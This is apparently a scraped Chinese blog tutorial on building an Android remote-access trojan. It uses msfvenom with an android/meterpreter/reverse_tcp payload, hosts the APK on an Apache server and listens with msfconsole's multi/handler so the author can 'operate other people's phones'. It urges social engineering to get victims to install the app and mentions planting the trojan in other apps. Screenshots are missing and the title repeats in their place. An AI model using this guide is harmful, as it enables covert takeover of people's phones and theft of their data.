基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听

前言

本文章仅用来学习交流,违法乱纪后果自负

第一步,利用msfvenom生成木马

msfvenom -p android/meterpreter/reverse_tcp
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
当然你也可以不自己建木马,你也可以在然后里植入木马,这个就牵扯反编译那些知识了。

第二步,开启apache2 外网服务器服务

基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
开启成功
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
这里补充几个命令
重新开启服务
service apache2 restart
关闭服务
service apache2 stop
最好在使用后关闭

如果开启不了,应该是占用了80端口
常见错误:
Job for apache2.service failed because the control process exited with error code.
See “systemctl status apache2.service” and “journalctl -xe” for details.

解决方法

第二步,利用apache2 外网服务器上传我们的安装包,以供安装手机下载

当然我们也也可以通过发送到安卓手机,通过你一切手段,也就是社会工程学,让别人手机装上这个软件,这里显得牛逼一点,咱用这个
把lll.apk挂到服务器去,也就是复制到外网服务器的文件夹里,linux里一切皆是文件嘛,当然你也可以不要命令行嘛。
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
已经放到服务器了,手机打开虚拟机ip地址看看
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听

第三步,开启msfconsole渗透利诱程序进行监听

我们设置一个监听,当我们有效载荷执行的时候会反弹信息连接到kali,这样我们就可以操作别人的手机了

基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
通过 multi/handler 这个模块设置监听程序
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
设置载荷,和生成木马时一样
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
查看载荷需要设置什么参数,基本就和创建木马时一样
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
设置IP地址和端口,和创建木马时一样
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
执行监听端程序
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
当安卓机打开软件
基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听基于kali linux msfvenom生成木马,开启apache2 外网服务器,启用msfconsole渗透利诱程序进行监听
说明已经控制手机,可以通过?来查询控制指令,也可以网上查找控制指令
大佬总结的命令

上一篇:使用mongosync同步数据


下一篇:sqlalchemy.exc.ProgrammingError: (pymysql.err.ProgrammingError)